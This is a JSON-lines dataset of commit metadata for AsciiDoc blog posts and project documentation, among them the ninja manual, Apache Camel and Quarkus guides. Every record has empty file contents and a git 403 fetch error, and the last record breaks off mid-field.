{"commit":"994bcc7afcb3de23f720cce09d9c5032f23b3ee0","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc0530d9702b5ad7ace353fdb2441abc351bc069","subject":"Update 2016-08-25-Watch-the-Main-Street-Electrical-Parade-Live.adoc","message":"Update 2016-08-25-Watch-the-Main-Street-Electrical-Parade-Live.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-08-25-Watch-the-Main-Street-Electrical-Parade-Live.adoc","new_file":"_posts\/2016-08-25-Watch-the-Main-Street-Electrical-Parade-Live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6826d20b096a896390a698a50292128d9a58b0ba","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To 
Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2f5b29a9c3e70f735b9c01d02061739b53f4dbf","subject":"Update 2016-02-15-Just-some-Pictures-of-the-RaspberryPi-Cluster-Setup.adoc","message":"Update 2016-02-15-Just-some-Pictures-of-the-RaspberryPi-Cluster-Setup.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-02-15-Just-some-Pictures-of-the-RaspberryPi-Cluster-Setup.adoc","new_file":"_posts\/2016-02-15-Just-some-Pictures-of-the-RaspberryPi-Cluster-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e27078a23988782b3da411dbbdf6e198f90650d","subject":"Update 2017-12-18-.adoc","message":"Update 2017-12-18-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-.adoc","new_file":"_posts\/2017-12-18-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aae17da85bf5b622a904ce047d2469c94cb2cb0d","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68ee8ea09b471800069c9dd96c0b2728df3006a3","subject":"doc: users: add TM example","message":"doc: users: add TM example\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,nmorey\/odp,dkrot\/odp","old_file":"doc\/users-guide\/users-guide-tm.adoc","new_file":"doc\/users-guide\/users-guide-tm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} 
{"commit":"c378cd01c1a74039f2e5b6c3358e924154a85706","subject":"Update 2015-12-05-PERT-by-Robert-CMartin.adoc","message":"Update 2015-12-05-PERT-by-Robert-CMartin.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2015-12-05-PERT-by-Robert-CMartin.adoc","new_file":"_posts\/2015-12-05-PERT-by-Robert-CMartin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce2d0d0b890d960db867faddfda148a56db771fb","subject":"OGM-285 documentation update","message":"OGM-285 documentation update\n","repos":"DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,Sanne\/hibernate-ogm,gunnarmorling\/hibernate-ogm,gunnarmorling\/hibernate-ogm,jhalliday\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,ZJaffee\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,uugaa\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,ZJaffee\/hibernate-ogm,mp911de\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,tempbottle\/hibernate-ogm,emmanuelbernard\/hibernate-ogm,hferentschik\/hibernate-ogm,jhalliday\/hibernate-ogm,schernolyas\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/configuration.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/configuration.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"924349becd6d55ca7290e300f32981e398eb57e5","subject":"Update 2018-09-07-wtf-tu-ne-veux-pas-de-ma-pr.adoc","message":"Update 2018-09-07-wtf-tu-ne-veux-pas-de-ma-pr.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-09-07-wtf-tu-ne-veux-pas-de-ma-pr.adoc","new_file":"_posts\/2018-09-07-wtf-tu-ne-veux-pas-de-ma-pr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18f60644466ff7a237066ff5fc57150b44efde58","subject":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"385b7f39f5eb602dd90d9aedee0f6147b695c762","subject":"reword manual for depfile\/rspfile escaping change","message":"reword manual for depfile\/rspfile escaping change\n","repos":"drbo\/ninja,mohamed\/ninja,ndsol\/subninja,liukd\/ninja,mgaunard\/ninja,automeka\/ninja,drbo\/ninja,synaptek\/ninja,Maratyszcza\/ninja-pypi,automeka\/ninja,ignatenkobrain\/ninja,liukd\/ninja,dorgonman\/ninja,Qix-\/ninja,rjogrady\/ninja,ctiller\/ninja,bradking\/ninja,atetubou\/ninja,fuchsia-mirror\/third_party-ninja,moroten\/ninja,hnney\/ninja,juntalis\/ninja,ilor\/ninja,automeka\/ninja,drbo\/ninja,mydongistiny\/ninja,syntheticpp\/ninja,nafest\/ninja,mydongistiny\/ninja,atetubou\/ninja,ctiller\/ninja,AoD314\/ninja,ThiagoGarciaAlves\/ninja,metti\/ninja,sxlin\/dist_ninja,synaptek\/ninja,autopulated\/ninja,bradking\/ninja,ndsol\/subninja,maruel\/ninja,drbo\/ninja,ignatenkobrain\/ninja,tfarina\/ninja,bradking\/ninja,bmeurer\/ninja,automeka\/ninja,dendy\/ninja,jimon\/ninja,jendrikillner\/ninja,bmeurer\/ninja,jendrikillner\/ninja,maruel\/ninja,mgaunard\/ninja,jendrikillner\/ninja,ignatenkobrain\/ninja,vvvrrooomm\/ninja,bmeurer\/ninja,nico\/ninja,dendy\/ninja,sgraham\/ninja,sgraham\/ninja,dorgonman\/ninja,moroten\/ninja,guiquanz\/ninja,Maratyszcza\/ninja-pypi,juntalis\/ninja,juntalis\/ninja,ThiagoGarciaAlves\/ninja,rjogrady\/ninja,iwadon\/ninja,syntheticpp\/ninja,sgraham\/ninja,metti\/ninja,Ju2ender\/ninja,lizh06\/ninja,sxlin\/dist_ninja,ilor\/ninja,nicolasdespres\/ninja,metti\/ninja,martine\/ninja,Ju2ender\/ninja,rjogrady\/ninja,ninja-build\/ninja,dorgonman\/ninja,ThiagoGarciaAlves\/ninja,synaptek\/ninja,Maratyszcza\/ninja-pypi,hnney\/ninja,sgraham\/ninja,sxlin\/dist_ninja,iwadon\/ninja,tfarina\/ninja,maruel\/ninja,vvvrrooomm\/ninja,nicolasdespres\/ninja,AoD314\/ninja,nafest\/ninja,jimon\/ninja,kissthink\/ninja,ndsol\/subninja,sxlin\/dist_ninja,ignatenkobrain\/ninja,iwadon\/ninja,Ju2ender\/ninja,vvvrrooomm\/ninja,mgaunard\/ninja,ndsol\/subninja,jimon\/ninja,synaptek\/ninja,moroten\/ninja,colincross\/ninja,mydongistiny\/ninja,nicolasdespres\/ninja,nafest\/ninja,Qix-\/ninja,autopulated\/ninja,dendy\/ninja,atetubou\/ninja,kissthink\/ninja,martine\/ninja,guiquanz\/ninja,AoD314\/ninja,mgaunard\/ninja,nafest\/ninja,fuchsia-mirror\/third_party-ninja,juntalis\/ninja,iwadon\/ninja,nico\/ninja,atetubou\/ninja,sxlin\/dist_ninja,bmeurer\/ninja,maruel\/ninja,nicolasdespres\/ninja,tfarina\/ninja,colincross\/ninja,vvvrrooomm\/ninja,ninja-build\/ninja,ilor\/ninja,autopulated\/ninja,hnney\/ninja,liukd\/ninja,nico\/ninja,autopulated\/ninja,rjogrady\/ninja,tfarina\/ninja,guiquanz\/ninja,ctiller\/ninja,jimon\/ninja,lizh06\/ninja,metti\/ninja,martine\/ninja,Maratyszcza\/ninja-pypi,syntheticpp\/ninja,sxlin\/dist_ninja,ninja-build\/ninja,Qix-\/ninja,fuchsia-mirror\/third_party-ninja,jendrikillner\/ninja,AoD314\/ninja,mohamed\/ninja,liukd\/ninja,dendy\/ninja,ctiller\/ninja,bradking\/ninja,Ju2ender\/ninja,kissthink\/ninja,colincross\/ninja,nico\/ninja,dorgonman\/ninja,colincross\/ninja,Qix-\/ninja,moroten\/ninja,lizh06\/ninja,ThiagoGarciaAlves\/ninja,ninja-build\/ninja,sxlin\/dist_ninja,ilor\/ninja,hnney\/ninja,mohamed\/ninja,kissthink\/ninja,mohamed\/ninja,syntheticpp\/ninja,guiquanz\/ninja,lizh06\/ninja,fuchsia-mirror\/third_party-ninja,martine\/ninja,mydongistiny\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"
stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29ea954eb78eea458cbd1aa4d75652358abe0139","subject":"how to install and be ready to use Reflect 2","message":"how to install and be ready to use Reflect 2\n","repos":"llaville\/php-reflect,remicollet\/php-reflect","old_file":"docs\/setup.asciidoc","new_file":"docs\/setup.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"999f045b679e8e434dd9652c36c9472e5c7f7e0f","subject":"Update 2017-09-19-zapier-Google-Trello.adoc","message":"Update 2017-09-19-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-19-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-19-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d66823d625786e3c545fe8200baeaa8df55567f","subject":"Basic documentation for zookeeper discovery","message":"Basic documentation for zookeeper discovery\n\nfixes gh-8\n","repos":"4finance\/spring-cloud-zookeeper,4finance\/spring-cloud-zookeeper,marcingrzejszczak\/spring-cloud-zookeeper,marcingrzejszczak\/spring-cloud-zookeeper,spring-cloud\/spring-cloud-zookeeper,spring-cloud\/spring-cloud-zookeeper","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-zookeeper.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-zookeeper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-zookeeper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dacd084f93e9b0167c331a76d4bc1293917ed816","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7139e8b121e33268ed2ad7170fa299085a71a65","subject":"Write the dev mode guide, includes IDE import","message":"Write the dev mode guide, includes IDE import\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/ide-configuration.adoc","new_file":"docs\/src\/main\/asciidoc\/ide-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6cc4d98739ec46949e1c760b6c2ef00a6139451","subject":"refs kato \u4e0d\u8981\u306a\u8a18\u4e8b\u524a\u9664","message":"refs kato \u4e0d\u8981\u306a\u8a18\u4e8b\u524a\u9664\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-app-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-app-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de7bc3c34cc768915d3149be21720a3b5c50a9fe","subject":"Create 2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","message":"Create 2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","repos":"yaks-all-the-way-down\/yaks-all-the-way-down.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io","old_file":"_posts\/2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","new_file":"_posts\/2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yaks-all-the-way-down\/yaks-all-the-way-down.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1303de5dd46cefa3ff443d98b2ac9e584b6bd607","subject":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","message":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fac5cc74cc3b4a50df9ca7f64ae50bca525f0ad2","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af4d023603460d27293c0b1f57e85af164dd3b4d","subject":"Update 2017-06-13-Kleine-Fabel.adoc","message":"Update 2017-06-13-Kleine-Fabel.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-06-13-Kleine-Fabel.adoc","new_file":"_posts\/2017-06-13-Kleine-Fabel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"edb5c412619ed7aaabb9d86749ae0567559e7695","subject":"Update 2013-03-19-The-Secret-of-Monkey-Island-dans-le-navigateur.adoc","message":"Update 2013-03-19-The-Secret-of-Monkey-Island-dans-le-navigateur.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2013-03-19-The-Secret-of-Monkey-Island-dans-le-navigateur.adoc","new_file":"_posts\/2013-03-19-The-Secret-of-Monkey-Island-dans-le-navigateur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54f94ec2841976c96ea31280e3c65f08c55860d0","subject":"Update 2016-05-22-First.adoc","message":"Update 2016-05-22-First.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2016-05-22-First.adoc","new_file":"_posts\/2016-05-22-First.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2180817cfacfb840882f80aceb045ad2137ce8c1","subject":"Update 2016-11-24-G-A-S.adoc","message":"Update 2016-11-24-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-24-G-A-S.adoc","new_file":"_posts\/2016-11-24-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4da4563283a13a6990960cfd394a0dd255ecc5df","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf3bfd22e71aefaad1c10fb62e674fd4bb2487c5","subject":"Update 2016-02-13-First-post-on-hubpress.adoc","message":"Update 2016-02-13-First-post-on-hubpress.adoc","repos":"mikqi\/blog,mikqi\/blog,mikqi\/blog,mikqi\/blog","old_file":"_posts\/2016-02-13-First-post-on-hubpress.adoc","new_file":"_posts\/2016-02-13-First-post-on-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikqi\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7c32395c50d74758a54eba28d81bd3b93d2ff45","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62797612549fbfc23e342624b864135715bd79ee","subject":"Update 2011-08-04-Eclipse-Kepler-est-arrive.adoc","message":"Update 2011-08-04-Eclipse-Kepler-est-arrive.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-04-Eclipse-Kepler-est-arrive.adoc","new_file":"_posts\/2011-08-04-Eclipse-Kepler-est-arrive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8b43c518b2e4b451f457a1a57f9c942d97e6bc5","subject":"Update 2016-02-23-Mickeys-Soundsational-Parade-live-streaming-event-tomorrow.adoc","message":"Update 2016-02-23-Mickeys-Soundsational-Parade-live-streaming-event-tomorrow.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-23-Mickeys-Soundsational-Parade-live-streaming-event-tomorrow.adoc","new_file":"_posts\/2016-02-23-Mickeys-Soundsational-Parade-live-streaming-event-tomorrow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5affb8f5a6f3c109f3b153f9a8d0911f8ac1db90","subject":"Update 2016-05-17-Modelling-Microservice-Patterns-in-Code.adoc","message":"Update 2016-05-17-Modelling-Microservice-Patterns-in-Code.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-05-17-Modelling-Microservice-Patterns-in-Code.adoc","new_file":"_posts\/2016-05-17-Modelling-Microservice-Patterns-in-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"578ae7e9b374beff1625c2488cb6e57bffee8fd1","subject":"Add minimal doc for camel-hystrix","message":"Add minimal doc for 
camel-hystrix\n","repos":"jonmcewen\/camel,nicolaferraro\/camel,jamesnetherton\/camel,prashant2402\/camel,anton-k11\/camel,CodeSmell\/camel,pax95\/camel,snurmine\/camel,christophd\/camel,snurmine\/camel,curso007\/camel,apache\/camel,davidkarlsen\/camel,DariusX\/camel,scranton\/camel,nboukhed\/camel,pkletsko\/camel,rmarting\/camel,alvinkwekel\/camel,tdiesler\/camel,prashant2402\/camel,alvinkwekel\/camel,onders86\/camel,objectiser\/camel,pax95\/camel,Thopap\/camel,yuruki\/camel,onders86\/camel,jamesnetherton\/camel,Fabryprog\/camel,christophd\/camel,isavin\/camel,pmoerenhout\/camel,tlehoux\/camel,scranton\/camel,DariusX\/camel,tlehoux\/camel,zregvart\/camel,isavin\/camel,yuruki\/camel,alvinkwekel\/camel,pmoerenhout\/camel,objectiser\/camel,gautric\/camel,scranton\/camel,scranton\/camel,acartapanis\/camel,DariusX\/camel,tadayosi\/camel,pkletsko\/camel,pkletsko\/camel,davidkarlsen\/camel,jamesnetherton\/camel,pkletsko\/camel,isavin\/camel,pkletsko\/camel,CodeSmell\/camel,prashant2402\/camel,acartapanis\/camel,acartapanis\/camel,Thopap\/camel,rmarting\/camel,gautric\/camel,adessaigne\/camel,dmvolod\/camel,curso007\/camel,jonmcewen\/camel,kevinearls\/camel,tlehoux\/camel,acartapanis\/camel,curso007\/camel,zregvart\/camel,christophd\/camel,snurmine\/camel,prashant2402\/camel,kevinearls\/camel,dmvolod\/camel,sverkera\/camel,tdiesler\/camel,anoordover\/camel,cunningt\/camel,gautric\/camel,jonmcewen\/camel,cunningt\/camel,yuruki\/camel,apache\/camel,sverkera\/camel,apache\/camel,anoordover\/camel,isavin\/camel,adessaigne\/camel,tadayosi\/camel,Thopap\/camel,nicolaferraro\/camel,alvinkwekel\/camel,snurmine\/camel,anoordover\/camel,onders86\/camel,scranton\/camel,punkhorn\/camel-upstream,tlehoux\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,mgyongyosi\/camel,tdiesler\/camel,ullgren\/camel,pmoerenhout\/camel,adessaigne\/camel,nboukhed\/camel,nboukhed\/camel,isavin\/camel,gautric\/camel,gautric\/camel,drsquidop\/camel,tdiesler\/camel,nikhilvibhav\/camel,prashant2402\/camel,objectiser\/camel,nboukhed\/camel,kevinearls\/camel,tadayosi\/camel,mgyongyosi\/camel,kevinearls\/camel,sverkera\/camel,anton-k11\/camel,acartapanis\/camel,mgyongyosi\/camel,christophd\/camel,pax95\/camel,rmarting\/camel,anoordover\/camel,cunningt\/camel,tdiesler\/camel,drsquidop\/camel,tlehoux\/camel,akhettar\/camel,n